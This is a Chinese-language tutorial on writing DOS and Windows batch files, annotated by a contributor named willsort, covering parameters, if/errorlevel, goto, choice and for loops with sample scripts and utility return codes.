    扩展名是bat(在nt/2000/xp/2003下也可以是cmd)的文件就是批处理文件。

    ==== 注 =======================================
    .bat是dos下的批处理文件
    .cmd是nt内核命令行环境的另一种批处理文件
    从 更广义的角度来看,unix的shell脚本以及其它操作系统甚至应用程序中由外壳进行解释执行的文本,都具有与批处理文件十分相似的作用,而且同样是由 专用解释器以行为单位解释执行,这种文本形式更通用的称谓是脚本语言。所以从某个程度分析,batch, unix shell, awk, basic, perl 等脚本语言都是一样的,只不过应用的范围和解释的平台各有不同而已。甚至有些应用程序仍然沿用批处理这一称呼,而其内容和扩展名与dos的批处理却又完全 不同。
    ===================================

    首先批处理文件是一个文本文件,这个文件的每一行都是一条DOS命令(大部分时候就好象我们在DOS提示符下执行的命令行一样),你可以使用DOS下的Edit或者Windows的记事本(notepad)等任何文本文件编辑工具创建和修改批处理文件。

    ==== 注 ===================
    批 处理文件中完全可以使用非dos命令,甚至可以使用不具有可执行特性的普通数据性文件,这缘于windows系统这个新型解释平台的涉入,使得批处理的应 用越来越"边缘化"。所以我们讨论的批处理应该限定在dos环境或者命令行环境中,否则很多观念和设定都需要做比较大的变动。
    ========================

    其 次,批处理文件是一种简单的程序,可以通过条件语句(if)和流程控制语句(goto)来控制命令运行的流程,在批处理中也可以使用循环语句(for)来 循环执行一条命令。当然,批处理文件的编程能力与C语言等编程语句比起来是十分有限的,也是十分不规范的。批处理的程序语句就是一条条的DOS命令(包括 内部命令和外部命令),而批处理的能力主要取决于你所使用的命令。

    ==== 注 ==================
    批 处理文件(batch file)也可以称之为批处理程序(batch program),这一点与编译型语言有所不同,就c语言来说,扩展名为c或者cpp的文件可以称之为c语言文件或者c语言源代码,但只有编译连接后的 exe文件才可以称之为c语言程序。因为批处理文件本身既具有文本的可读性,又具有程序的可执行性,这些称谓的界限是比较模糊的。
    ===========================

    第 三,每个编写好的批处理文件都相当于一个DOS的外部命令,你可以把它所在的目录放到你的DOS搜索路径(path)中来使得它可以在任意位置运行。一个 良好的习惯是在硬盘上建立一个bat或者batch目录(例如C:/BATCH),然后将所有你编写的批处理文件放到该目录中,这样只要在path中设置 上c:/batch,你就可以在任意位置运行所有你编写的批处理程序。

    ==== 注 =====
    纯以dos系统而言,可执 行程序大约可以细分为五类,依照执行优先级由高到低排列分别是:DOSKEY宏命令(预先驻留内存),COMMAND.COM中的内部命令(根据内存的环 境随时进驻内存),以com为扩展名的可执行程序(由command.com 直接载入内存),以exe位扩展名的可执行程序(由command.com 重定位后载入内存),以bat位扩展名的批处理程序(由command.com 解释分析,根据其内容按优先级顺序调用第2,3,4,5种可执行程序,分析一行,执行一行,文件本身不载入内存)
    ============ 第 四,在DOS和Win9x/Me系统下,C:盘根目录下的AUTOEXEC.BAT批处理文件是自动运行批处理文件,每次系统启动时会自动运行该文件,你 可以将系统每次启动时都要运行的命令放入该文件中,例如设置搜索路径,调入鼠标驱动和磁盘缓存,设置系统环境变量等。下面是一个运行于Windows 98下的autoexec.bat的示例:
    @ECHO OFF
    PATH C:/WINDOWS;C:/WINDOWS/COMMAND;C:/UCDOS;C:/DOSTools;<br>
    C:/SYSTOOLS;C:/WINTOOLS;C:/BATCH
    LH SMARTDRV.EXE /X
    LH DOSKEY.COM /insert
    LH CTMOUSE.EXE
    SET TEMP=D:/TEMP
    SET TMP=D:/TEMP
    ==== 注 =====
    AUTOEXEC.BAT为DOS系统的自动运行批处理文件,由COMMAND.COM启动时解释执行;
    而在Win9x环境中,不仅增加支持了 DOSSTART.BAT, WINSTART.BAT 等许多其它自动运行的批处理文件,对AUTOEXEC.BAT 也增加了 .DOS .W40 .BAK .OLD .PWS 等许多变体以适应复杂的环境和多变的需求。
    ==== willsort 编注 =============
    以 下关于命令的分类,有很多值得推敲的地方。常用命令中的@本不是命令,而dir、copy等也很常用的命令却没有列入, 而特殊命令中所有命令对我来说都是常用命令。建议将批处理所引用的命令分为内部命令、外部命令、第三方程序三类。而内部命令和外部命令中别有一类是专用于 或常用于批处理中的命令可称之为"批处理命令"。

    以下摘录MS-DOS 6.22 帮助文档中关于"批处理命令"的文字,当然,其中有些概念和定义已经有些落后了。

    批处理命令

    批处理文件或批处理程序是一个包含若干MS-DOS命令的正文文件,扩展名为.BAT。当在命令提示符下敲入批处理程序的名称时,MS-DOS成组执行此批处理程序中的命令。

    任何在命令提示符下可使用的命令都可用在批处理程序中。此外,下面MS-DOS命令是专门在批处理程序中使用的。
    ==========

    常用命令

    echo、@、call、pause、rem(小技巧:用::代替rem)是批处理文件最常用的几个命令,我们就从他们开始学起。

    ==== 注 ===========
    首先, @ 不是一个命令, 而是DOS 批处理的一个特殊标记符, 仅用于屏蔽命令行回显. 下面是DOS命令行或批处理中可能会见到的一些特殊标记符:
    CR(0D) 命令行结束符
    Escape(1B) ANSI转义字符引导符
    Space(20) 常用的参数界定符
    Tab(09) ; = 不常用的参数界定符
    + COPY命令文件连接符
    * ? 文件通配符
    "" 字符串界定符
    | 命令管道符
    < > >> 文件重定向符
    @ 命令行回显屏蔽符
    / 参数开关引导符
    : 批处理标签引导符
    % 批处理变量引导符

    其次, :: 确实可以起到rem 的注释作用, 而且更简洁有效; 但有两点需要注意:
    第一, 除了 :: 之外, 任何以 :开头的字符行, 在批处理中都被视作标号, 而直接忽略其后的所有内容, 只是为了与正常的标号相区别, 建议使用 goto 所无法识别的标号, 即在 :后紧跟一个非字母数字的一个特殊符号.
    第 二, 与rem 不同的是, ::后的字符行在执行时不会回显, 无论是否用echo on打开命令行回显状态, 因为命令解释器不认为他是一个有效的命令行, 就此点来看, rem 在某些场合下将比 :: 更为适用; 另外, rem 可以用于 config.sys 文件中.
    =====================

    echo 表示显示此命令后的字符
    echo off 表示在此语句后所有运行的命令都不显示命令行本身
    @与echo off相象,但它是加在每个命令行的最前面,表示运行时不显示这一行的命令行(只能影响当前行)。
    call 调用另一个批处理文件(如果不用call而直接调用别的批处理文件,那么执行完那个批处理文件后将无法返回当前文件并执行当前文件的后续命令)。
    pause 运行此句会暂停批处理的执行并在屏幕上显示Press any key to continue...的提示,等待用户按任意键后继续
    rem 表示此命令后的字符为解释行(注释),不执行,只是给自己今后参考用的(相当于程序中的注释)。
    ==== 注 =====
    此处的描述较为混乱, 不如直接引用个命令的命令行帮助更为条理

    -------------------------
    ECHO

    当程序运行时,显示或隐藏批处理程序中的正文。也可用于允许或禁止命令的回显。

    在运行批处理程序时,MS-DOS一般在屏幕上显示(回显)批处理程序中的命令。
    使用ECHO命令可关闭此功能。

    语法

    ECHO [ON|OFF]

    若要用echo命令显示一条命令,可用下述语法:

    echo [message]

    参数

    ON|OFF
    指定是否允许命令的回显。若要显示当前的ECHO的设置,可使用不带参数的ECHO
    命令。

    message
    指定让MS-DOS在屏幕上显示的正文。

    -------------------

    CALL

    从一个批处理程序中调用另一个批处理程序,而不会引起第一个批处理的中止。

    语法

    CALL [drive:][path]filename [batch-parameters]

    参数

    [drive:][path]filename
    指定要调用的批处理程序的名字及其存放处。文件名必须用.BAT作扩展名。


    batch-parameters
    指定批处理程序所需的命令行信息。

    -------------------------------

    PAUSE

    暂停批处理程序的执行并显示一条消息,提示用户按任意键继续执行。只能在批处
    理程序中使用该命令。

    语法

    PAUSE


    REM

    在批处理文件或CONFIG.SYS中加入注解。也可用REM命令来屏蔽命令(在CONFIG.SYS
    中也可以用分号 ; 代替REM命令,但在批处理文件中则不能替代)。

    语法

    REM [string]

    参数

    string
    指定要屏蔽的命令或要包含的注解。
    =======================

    例1:用edit编辑a.bat文件,输入下列内容后存盘为c:/a.bat,执行该批处理文件后可实现:将根目录中所有文件写入 a.txt中,启动UCDOS,进入WPS等功能。

      批处理文件的内容为:         命令注释:

        @echo off           不显示后续命令行及当前命令行
        dir c:/*.* >a.txt       将c盘文件列表写入a.txt
        call c:/ucdos/ucdos.bat    调用ucdos
        echo 你好            显示"你好"
        pause              暂停,等待按键继续
        rem 准备运行wps         注释:准备运行wps
        cd ucdos            进入ucdos目录
        wps               运行wps  

    批处理文件的参数

    批处理文件还可以像C语言的函数一样使用参数(相当于DOS命令的命令行参数),这需要用到一个参数表示符"%"。

    %[1-9]表示参数,参数是指在运行批处理文件时在文件名后加的以空格(或者Tab)分隔的字符串。变量可以从%0到%9,%0表示批处理命令本身,其它参数字符串用%1到%9顺序表示。

    例2:C:根目录下有一批处理文件名为f.bat,内容为:
    @echo off
    format %1

    如果执行C:/>f a:
    那么在执行f.bat时,%1就表示a:,这样format %1就相当于format a:,于是上面的命令运行时实际执行的是format a:

    例3:C:根目录下一批处理文件名为t.bat,内容为:
    @echo off
    type %1
    type %2

    那么运行C:/>t a.txt b.txt
    %1 : 表示a.txt
    %2 : 表示b.txt
    于是上面的命令将顺序地显示a.txt和b.txt文件的内容。

    ==== 注 ===============
    参 数在批处理中也作为变量处理, 所以同样使用百分号作为引导符, 其后跟0-9中的一个数字构成参数引用符. 引用符和参数之间 (例如上文中的 %1 与 a: ) 的关系类似于变量指针与变量值的关系. 当我们要引用第十一个或更多个参数时, 就必须移动DOS 的参数起始指针. shift 命令正充当了这个移动指针的角色, 它将参数的起始指针移动到下一个参数, 类似C 语言中的指针操作. 图示如下:

    初始状态, cmd 为命令名, 可以用 %0 引用
    cmd arg1 arg2 arg3 arg4 arg5 arg6 arg7 arg8 arg9 arg10
    ^ ^ ^ ^ ^ ^ ^ ^ ^ ^
    | | | | | | | | | |
    %0 %1 %2 %3 %4 %5 %6 %7 %8 %9

    经过1次shift后, cmd 将无法被引用
    cmd arg1 arg2 arg3 arg4 arg5 arg6 arg7 arg8 arg9 arg10
    ^ ^ ^ ^ ^ ^ ^ ^ ^ ^
    | | | | | | | | | |
    %0 %1 %2 %3 %4 %5 %6 %7 %8 %9

    经过2次shift后, arg1也被废弃, %9指向为空, 没有引用意义
    cmd arg1 arg2 arg3 arg4 arg5 arg6 arg7 arg8 arg9 arg10
    ^ ^ ^ ^ ^ ^ ^ ^ ^
    | | | | | | | | |
    %0 %1 %2 %3 %4 %5 %6 %7 %8

    遗憾的是, win9x 和DOS下均不支持 shift 的逆操作. 只有在 nt 内核命令行环境下, shift 才支持 /n 参数, 可以以第一参数为基准返复移动起始指针.
    =================

    特殊命令


    if goto choice for是批处理文件中比较高级的命令,如果这几个你用得很熟练,你就是批处理文件的专家啦。


    一、if 是条件语句,用来判断是否符合规定的条件,从而决定执行不同的命令。 有三种格式:

    1、if [not] "参数" == "字符串" 待执行的命令

    参数如果等于(not表示不等,下同)指定的字符串,则条件成立,运行命令,否则运行下一句。

    例:if "%1"=="a" format a:

    ====

    if 的命令行帮助中关于此点的描述为:
    IF [NOT] string1==string2 command
    在此有以下几点需要注意:
    1. 包含字符串的双引号不是语法所必须的, 而只是习惯上使用的一种"防空"字符
    2. string1 未必是参数, 它也可以是环境变量, 循环变量以及其他字符串常量或变量
    3. command 不是语法所必须的, string2 后跟一个空格就可以构成一个有效的命令行
    =============================

    2、if [not] exist [路径/]文件名 待执行的命令
    如果有指定的文件,则条件成立,运行命令,否则运行下一句。

    如: if exist c:/config.sys type c:/config.sys
    表示如果存在c:/config.sys文件,则显示它的内容。

    ****** 注 ********
    也可以使用以下的用法:
    if exist command
    device 是指DOS系统中已加载的设备, 在win98下通常有:
    AUX, PRN, CON, NUL
    COM1, COM2, COM3, COM4
    LPT1, LPT2, LPT3, LPT4
    XMSXXXX0, EMMXXXX0
    A: B: C: ...,
    CLOCK$, CONFIG$, DblBuff$, IFS$HLP$
    具体的内容会因硬软件环境的不同而略有差异, 使用这些设备名称时, 需要保证以下三点:
    1. 该设备确实存在(由软件虚拟的设备除外)
    2. 该设备驱动程序已加载(aux, prn等标准设备由系统缺省定义)
    3. 该设备已准备好(主要是指a: b: ..., com1..., lpt1...等)
    可通过命令 mem/d | find "device" /i 来检阅你的系统中所加载的设备
    另 外, 在DOS系统中, 设备也被认为是一种特殊的文件, 而文件也可以称作字符设备; 因为设备(device)与文件都是使用句柄(handle)来管理的, 句柄就是名字, 类似于文件名, 只不过句柄不是应用于磁盘管理, 而是应用于内存管理而已, 所谓设备加载也即指在内存中为其分配可引用的句柄.
    ==================================

    3、if errorlevel <数字> 待执行的命令

    很 多DOS程序在运行结束后会返回一个数字值用来表示程序运行的结果(或者状态),通过if errorlevel命令可以判断程序的返回值,根据不同的返回值来决定执行不同的命令(返回值必须按照从大到小的顺序排列)。如果返回值等于指定的数 字,则条件成立,运行命令,否则运行下一句。

    如if errorlevel 2 goto x2

    ==== 注 ===========
    返回值从大到小的顺序排列不是必须的, 而只是执行命令为 goto 时的习惯用法, 当使用 set 作为执行命令时, 通常会从小到大顺序排列, 比如需将返回码置入环境变量, 就需使用以下的顺序形式:

    if errorlevel 1 set el=1
    if errorlevel 2 set el=2
    if errorlevel 3 set el=3
    if errorlevel 4 set el=4
    if errorlevel 5 set el=5
    ...

    当然, 也可以使用以下循环来替代, 原理是一致的:
    for %%e in (1 2 3 4 5 6 7 8...) do if errorlevel %%e set el=%%e

    更高效简洁的用法, 可以参考我写的另一篇关于获取 errorlevel 的文章

    出 现此种现象的原因是, if errorlevel 比较返回码的判断条件并非等于, 而是大于等于. 由于 goto 的跳转特性, 由小到大排序会导致在较小的返回码处就跳出; 而由于 set命令的 "重复" 赋值特性, 由大到小排序会导致较小的返回码 "覆盖" 较大的返回码.

    另外, 虽然 if errorlevel=<数字> command 也是有效的命令行, 但也只是 command.com 解释命令行时将 = 作为命令行切分符而忽略掉罢了
    ===========================


    二、goto 批处理文件运行到这里将跳到goto所指定的标号(标号即label,标号用:后跟标准字符串来定义)处,goto语句一般与if配合使用,根据不同的条件来执行不同的命令组。

    如:

    goto end

    :end
    echo this is the end

    标号用":字符串"来定义,标号所在行不被执行。

    ==== willsort 编注

    label 常被译为 "标签" , 但是这并不具有广泛的约定性.

    goto 与 : 联用可实现执行中途的跳转, 再结合 if 可实现执行过程的条件分支, 多个 if 即可实现命令的分组, 类似 C 中 switch case 结构或者 Basic 中的 select case 结构, 大规模且结构化的命令分组即可实现高级语言中的函数功能. 以下是批处理和C/Basic在语法结构上的对照:

    Batch C / Basic
    goto&: goto&:
    goto&:&if if{}&else{} / if&elseif&endif
    goto&:&if... switch&case / select case
    goto&:&if&set&envar... function() / function(),sub()
    ==================================
    三、choice 使用此命令可以让用户输入一个字符(用于选择),从而根据用户的选择返回不同的errorlevel,然后于if errorlevel配合,根据用户的选择运行不同的命令。

    注意:choice命令为DOS或者Windows系统提供的外部命令,不同版本的choice命令语法会稍有不同,请用choice /?查看用法。

    choice的命令语法(该语法为Windows 2003中choice命令的语法,其它版本的choice的命令语法与此大同小异):

    CHOICE [/C choices] [/N] [/CS] [/T timeout /D choice] [/M text]

    描述:
    该工具允许用户从选择列表选择一个项目并返回所选项目的索引。

    参数列表:
    /C choices 指定要创建的选项列表。默认列表是 "YN"。

    /N 在提示符中隐藏选项列表。提示前面的消息得到显示,
    选项依旧处于启用状态。

    /CS 允许选择分大小写的选项。在默认情况下,这个工具
    是不分大小写的。

    /T timeout 做出默认选择之前,暂停的秒数。可接受的值是从 0
    到 9999。如果指定了 0,就不会有暂停,默认选项
    会得到选择。

    /D choice 在 nnnn 秒之后指定默认选项。字符必须在用 /C 选
    项指定的一组选择中; 同时,必须用 /T 指定 nnnn。

    /M text 指定提示之前要显示的消息。如果没有指定,工具只
    显示提示。

    /? 显示帮助消息。

    注意:
    ERRORLEVEL 环境变量被设置为从选择集选择的键索引。列出的第一个选
    择返回 1,第二个选择返回 2,等等。如果用户按的键不是有效的选择,
    该工具会发出警告响声。如果该工具检测到错误状态,它会返回 255 的
    ERRORLEVEL 值。如果用户按 Ctrl+Break 或 Ctrl+C 键,该工具会返回 0
    的 ERRORLEVEL 值。在一个批程序中使用 ERRORLEVEL 参数时,将参数降
    序排列。

    示例:
    CHOICE /?
    CHOICE /C YNC /M "确认请按 Y,否请按 N,或者取消请按 C。"
    CHOICE /T 10 /C ync /CS /D y
    CHOICE /C ab /M "选项 1 请选择 a,选项 2 请选择 b。"
    CHOICE /C ab /N /M "选项 1 请选择 a,选项 2 请选择 b。"

    ==== willsort 编注 ===============================
    我列出win98下choice的用法帮助, 已资区分

    Waits for the user to choose one of a set of choices.
    等待用户选择一组待选字符中的一个

    CHOICE [/C[:]choices] [/N] [/S] [/T[:]c,nn] [text]

    /C[:]choices Specifies allowable keys. Default is YN
    指定允许的按键(待选字符), 默认为YN
    /N Do not display choices and ? at end of prompt string.
    不显示提示字符串中的问号和待选字符
    /S Treat choice keys as case sensitive.
    处理待选字符时大小写敏感
    /T[:]c,nn Default choice to c after nn seconds
    在 nn 秒后默认选择 c
    text Prompt string to display
    要显示的提示字符串
    ERRORLEVEL is set to offset of key user presses in choices.
    ERRORLEVEL 被设置为用户键入的字符在待选字符中的偏移值
    如果我运行命令:CHOICE /C YNC /M "确认请按 Y,否请按 N,或者取消请按 C。"
    屏幕上会显示:
    确认请按 Y,否请按 N,或者取消请按 C。 [Y,N,C]?


    例:test.bat的内容如下(注意,用if errorlevel判断返回值时,要按返回值从高到低排列):
    @echo off
    choice /C dme /M "defrag,mem,end"
    if errorlevel 3 goto end
    if errorlevel 2 goto mem
    if errorlevel 1 goto defrag

    :defrag
    c:/dos/defrag
    goto end

    :mem
    mem
    goto end

    :end
    echo good bye

    此 批处理运行后,将显示"defrag,mem,end[D,M,E]?" ,用户可选择d m e ,然后if语句根据用户的选择作出判断,d表示执行标号为defrag的程序段,m表示执行标号为mem的程序段,e表示执行标号为end的程序段,每个 程序段最后都以goto end将程序跳到end标号处,然后程序将显示good bye,批处理运行结束。

    四、for 循环命令,只要条件符合,它将多次执行同一命令。

    语法:
    对一组文件中的每一个文件执行某个特定命令。

    FOR %%variable IN (set) DO command [command-parameters]

    %%variable 指定一个单一字母可替换的参数。
    (set) 指定一个或一组文件。可以使用通配符。
    command 指定对每个文件执行的命令。
    command-parameters
    为特定命令指定参数或命令行开关。

    例如一个批处理文件中有一行:
    for %%c in (*.bat *.txt) do type %%c

    则该命令行会显示当前目录下所有以bat和txt为扩展名的文件的内容。

    ==== willsort 编注 =====================================================
    需要指出的是, 当()中的字符串并非单个或多个文件名时, 它将单纯被当作字符串替换, 这个特性再加上()中可以嵌入多个字符串的特性, 很明显 for 可以被看作一种遍历型循环.
    当然, 在 nt/2000/xp/2003 系列的命令行环境中, for 被赋予了更多的特性, 使之可以分析命令输出或者文件中的字符串, 也有很多开关被用于扩展了文件替换功能.
    ========================================================================

    批处理示例

    1. IF-EXIST

    1) 首先用记事本在C:/建立一个test1.bat批处理文件,文件内容如下:
    @echo off
    IF EXIST /AUTOEXEC.BAT TYPE /AUTOEXEC.BAT
    IF NOT EXIST /AUTOEXEC.BAT ECHO /AUTOEXEC.BAT does not exist

    然后运行它:
    C:/>TEST1.BAT

    如果C:/存在AUTOEXEC.BAT文件,那么它的内容就会被显示出来,如果不存在,批处理就会提示你该文件不存在。

    2) 接着再建立一个test2.bat文件,内容如下:
    @ECHO OFF
    IF EXIST /%1 TYPE /%1
    IF NOT EXIST /%1 ECHO /%1 does not exist

    执行:
    C:/>TEST2 AUTOEXEC.BAT
    该命令运行结果同上。

    说明:
    (1) IF EXIST 是用来测试文件是否存在的,格式为
    IF EXIST [路径+文件名] 命令
    (2) test2.bat文件中的%1是参数,DOS允许传递9个批参数信息给批处理文件,分别为%1~%9(%0表示test2命令本身) ,这有点象编程中的实参和形参的关系,%1是形参,AUTOEXEC.BAT是实参。

    ==== willsort 编注 =====================================================
    DOS没有 "允许传递9个批参数信息" 的限制, 参数的个数只会受到命令行长度和所调用命令处理能力的限制. 但是, 我们在批处理程序中, 在同一时刻只能同时引用10个参数, 因为 DOS只给出了 %0~%9这十个参数引用符.
    ========================================================================

    3) 更进一步的,建立一个名为TEST3.BAT的文件,内容如下:
    @echo off
    IF "%1" == "A" ECHO XIAO
    IF "%2" == "B" ECHO TIAN
    IF "%3" == "C" ECHO XIN

    如果运行:
    C:/>TEST3 A B C
    屏幕上会显示:
    XIAO
    TIAN
    XIN

    如果运行:
    C:/>TEST3 A B
    屏幕上会显示
    XIAO
    TIAN

    在这个命令执行过程中,DOS会将一个空字符串指定给参数%3。

    2、IF-ERRORLEVEL

    建立TEST4.BAT,内容如下:
    @ECHO OFF
    XCOPY C:/AUTOEXEC.BAT D:/
    IF ERRORLEVEL 1 ECHO 文件拷贝失败
    IF ERRORLEVEL 0 ECHO 成功拷贝文件

    然后执行文件:
    C:/>TEST4

    如果文件拷贝成功,屏幕就会显示"成功拷贝文件",否则就会显示"文件拷贝失败"。

    IF ERRORLEVEL 是用来测试它的上一个DOS命令的返回值的,注意只是上一个命令的返回值,而且返回值必须依照从大到小次序顺序判断。
    因此下面的批处理文件是错误的:

    @ECHO OFF
    XCOPY C:/AUTOEXEC.BAT D:/
    IF ERRORLEVEL 0 ECHO 成功拷贝文件
    IF ERRORLEVEL 1 ECHO 未找到拷贝文件
    IF ERRORLEVEL 2 ECHO 用户通过ctrl-c中止拷贝操作
    IF ERRORLEVEL 3 ECHO 预置错误阻止文件拷贝操作
    IF ERRORLEVEL 4 ECHO 拷贝过程中写盘错误

    无论拷贝是否成功,后面的:

    未找到拷贝文件
    用户通过ctrl-c中止拷贝操作
    预置错误阻止文件拷贝操作
    拷贝过程中写盘错误

    都将显示出来。

    以下就是几个常用命令的返回值及其代表的意义:

    backup
    0 备份成功
    1 未找到备份文件
    2 文件共享冲突阻止备份完成
    3 用户用ctrl-c中止备份
    4 由于致命的错误使备份操作中止

    diskcomp
    0 盘比较相同
    1 盘比较不同
    2 用户通过ctrl-c中止比较操作
    3 由于致命的错误使比较操作中止
    4 预置错误中止比较

    diskcopy
    0 盘拷贝操作成功
    1 非致命盘读/写错
    2 用户通过ctrl-c结束拷贝操作
    3 因致命的处理错误使盘拷贝中止
    4 预置错误阻止拷贝操作

    format
    0 格式化成功
    3 用户通过ctrl-c中止格式化处理
    4 因致命的处理错误使格式化中止
    5 在提示"proceed with format(y/n)?"下用户键入n结束

    xcopy
    0 成功拷贝文件
    1 未找到拷贝文件
    2 用户通过ctrl-c中止拷贝操作
    4 预置错误阻止文件拷贝操作
    5 拷贝过程中写盘错误

    chkdsk
    0 未找到错误
    255 找到一个或多个错误

    choice
    0 用户按下ctrl+c/break
    1 用户按下第一个键
    255 检测到命令行中的错误条件
    其它 用户按下的有效字符在列表中的位置

    defrag
    0 碎片压缩成功
    1 出现内部错误
    2 磁盘上没有空簇。要运行DEFRAG,至少要有一个空簇
    3 用户用Ctrl+C退出了DEFRAG
    4 出现一般性错误
    5 DEFRAG在读簇时遇到错误
    6 DEFRAG在写簇时遇到错误
    7 分配空间有错
    8 内存错
    9 没有足够空间来压缩磁盘碎片

    deltree
    0 成功地删除一个目录

    diskcomp
    0 两盘相同
    1 发现不同
    2 按CTRL+C 终止了比较
    3 出现严重错误
    4 出现初始化错误

    find
    0 查找成功且至少找到了一个匹配的字符串
    1 查找成功但没找到匹配的字符串
    2 查找中出现了错误

    keyb
    0 键盘定义文件装入成功
    1 使用了非法的键盘代码,字符集或语法
    2 键盘定义文件坏或未找到
    4 键盘、监视器通讯时出错
    5 要求的字符集未准备好

    move
    0 成功地移动了指定的文件
    1 发生了错误

    msav /N
    86 检查到了病毒

    replace
    0 REPLACE成功地替换或加入了文件
    1 MS-DOS版本和REPLACE不兼容
    2 REPLACE找不到源文件
    3 REPLACE找不到源路径或目标路径
    5 不能存取要替换的文件
    8 内存不够无法执行REPLACE
    11 命令行句法错误

    restore
    0 RESTORE成功地恢复了文件
    1 RESTORE找不到要恢复的文件
    3 用户按CTRL+C终止恢复过程
    4 RESTORE因错误而终止

    scandisk
    0 ScanDisk在它检查的驱动器上未检测到任何错误
    1 由于命令行的语法不对,不能运行ScanDisk
    2 由于内存用尽或发生内部错误,ScanDisk意外终止
    3 用户让ScanDisk中途退出
    4 进行盘面扫描时,用户决定提前退出
    254 ScanDisk找到磁盘故障并已全部校正
    255 ScanDisk找到磁盘故障,但未能全部校正

    setver
    0 SETVER成功地完成了任务
    1 用户指定了一个无效的命令开关
    2 用户指定了一个非法的文件名
    3 没有足够的系统内存来运行命令
    4 用户指定了一个非法的版本号格式
    5 SETVER在版本表中未找到指定的项
    6 SETVER未找到SETVER.EXE文件
    7 用户指定了一个非法的驱动器
    8 用户指定了太多的命令行参数
    9 SETVER检测到丢失了命令行参数
    10 在读SETVER.EXE文件时,SETVER检测到发生错误
    11 SETVER.EXE文件损坏
    12 指定的SETVER.EXE文件不支持版本表
    13 版本表中没有足够的空间存放新的项
    14 在写SETVER.EXE文件时SETVER检测到发生错误
    ========================================================================

    3、IF STRING1 == STRING2

    建立TEST5.BAT,文件内容如下:
    @echo off
    IF "%1" == "A" FORMAT A:

    执行:
    C:/>TEST5 A
    屏幕上就出现是否将A:盘格式化的内容。

    注意:为了防止参数为空的情况,一般会将字符串用双引号(或者其它符号,注意不能使用保留符号)括起来。
    如:if [%1]==[A] 或者 if %1*==A*

    5、GOTO

    建立TEST6.BAT,文件内容如下:
    @ECHO OFF
    IF EXIST C:/AUTOEXEC.BAT GOTO _COPY
    GOTO _DONE
    :_COPY
    COPY C:/AUTOEXEC.BAT D:/
    :_DONE

    注意:
    (1) 标号前是ASCII字符的冒号":",冒号与标号之间不能有空格。
    (2) 标号的命名规则与文件名的命名规则相同。
    (3) DOS支持最长八位字符的标号,当无法区别两个标号时,将跳转至最近的一个标号。

    ==== willsort 编注 =====================================================
    1)标号也称作标签(label)
    2)标签不能以大多数的非字母数字字符开始, 而文件名中则可以使用很多
    3)当无法区别两个标签时, 将跳转至位置最靠前的标签
    ========================================================================

    6、FOR

    建立C:/TEST7.BAT,文件内容如下:
    @ECHO OFF
    FOR %%C IN (*.BAT *.TXT *.SYS) DO TYPE %%C

    运行:
    C:/>TEST7

    执行以后,屏幕上会将C:盘根目录下所有以BAT、TXT、SYS为扩展名的文件内容显示出来(不包括隐藏文件)

    展开全文
  • windows bat 批处理脚本编写指南

    千次阅读 2020-02-01 20:20:45
    本文由浅入深,比较系统地讲解了windows bat 批处理脚本编写指南,包括:windows bat批处理脚本概述,变量使用, 程序返回码及errorlevel使用,stdin、stdout、stderr,if判断与&、&&、||, for循环使用,函数goto...
  • 照我的理解,批处理的本质,是一堆DOS命令按一定顺序...它的构成没有固定格式,只要遵守以下这条就ok了:每一行可视为一个命令,每个命令里可以含多条子命令,从第一行开始执行,直到最后一行结束,它运行的平台是DO
  • 这是一个官方文档的补充版,以官方文档的快速上手:制作第一个游戏为基础,整合了其他文档内容,同时添加一下自己学习文档的理解,不仅能复习一下自己学到的知识,也帮助新人学习开发更加简单,好了,话不多说,进入...
  • windows bat脚本编写

    万次阅读 多人点赞 2018-08-03 17:55:31
    windows批处理 (cmd/bat) 编程详解  开始之前先简单说明下cmd文件和bat文件的区别:在本质上两者没有区别,都是简单的文本编码方式,都可以用记事本创建、编辑和查看。两者所用的命令行代码也是共用的,只是cmd...
  • windows脚本-CMD和Batch

    千次阅读 2015-04-08 10:21:41
    、DOS,CMD和batch  DOS是磁盘操作系统(英文:Disk Operating System)的缩写,是个人... batch是DOS系统下的脚本,这些脚本是纯文本文档,以.bat为结尾,可以用任何文本编辑器来进行编辑。它的特点是文件的
  • airtest 介绍 airtest使用截屏录制脚本使用poco控件录制脚本。...airtest是一个跨平台的UI自动化测试工具,推出了强大的自动化编辑工具,airtest IDE。 airtest IDE 提供了两个测试框架,airtest和poco。 a...
  • 首先创建一个启动脚本 init.bat,内容如下: time /t &gt;&gt; c:\test\test.log echo %COMPUTERNAME% &gt;&gt; c:\test\test.log echo %USERNAME% &gt;&gt; c:\test\test.log 然后将此...
  • 一个简单的SHELL脚本模板

    千次阅读 2016-08-29 10:11:01
    一个简单的SHELL脚本模板,适用于Java项目的启动,停止,重启。
  • sh 脚本判断 tomcat是否已启动

    千次阅读 2014-11-13 16:47:47
    sh 脚本判断 tomcat是否已启动
  • Windows BAT批处理脚本教程

    千次阅读 2015-03-18 11:48:09
    批处理定义:顾名思义,批处理文件是将一系列命令按一定的顺序集合为一个可执行的文本文件,其扩展名为BAT或者CMD。这些命令统称批处理命令。 小知识:可以在键盘上按下Ctrl+C组合键来强行终止一个批处理的执行过程...
  • windows 10 bash里编写脚本

    千次阅读 2017-11-07 23:20:00
    windows 10 bash里编写脚本 参照:https://www.howtoip.com/how-to-create-and-run-bash-shell-scripts-on-windows-10/ 例子由自己在windows pro build 15063 linux 子系统里测试完成 如何win 10 bash 上编写脚本 ...
  • Windows下bat脚本(cmd命令学习)

    千次阅读 2019-06-24 10:52:44
    这样既可在黑窗口里面书写bat命令,然后写完后按ctrl+z结束编辑使用edit来创建(很古老已不用) ③使用记事本,改扩展名为bat(现在几乎都使用此方法) bat的常用语法及功能 ①echo 要在屏幕上显示的信息 ...
  • Vim编辑器与Shell命令脚本

    千次阅读 2018-02-22 22:55:40
    本章目录结构 [收起]4.1 Vim文本编辑器4.1.1 编写简单文档4.1.2 配置主机名称4.1.3 配置网卡信息4.1.4 配置Yum仓库4.2 编写Shell脚本4.2.1 编写简单的脚本4.2.2 接收用户的参数4.2.3 判断用户的参数4.3 流程控制...
  • 用Python做一个游戏辅助脚本(含完整编程思路)

    千次阅读 多人点赞 2019-11-19 15:11:15
    、说明 简述:本文将以4399小游戏《 宠物连连看经典版2 》作为测试案例,通过识别小图标,模拟鼠标点击,快速完成配对。对于有兴趣学习游戏脚本的同学有一定的帮助。 运行环境:Win10/Python3.5。 主要模块:...
  • echo、@、call、pause、rem(小技巧:用::代替rem)是批处理文件最常用的几个命令,我们就从他们开始学起。  echo 表示显示此命令后的字符  echo off 表示在此语句后...call 调用另一个批处理文件(如果不用call而直
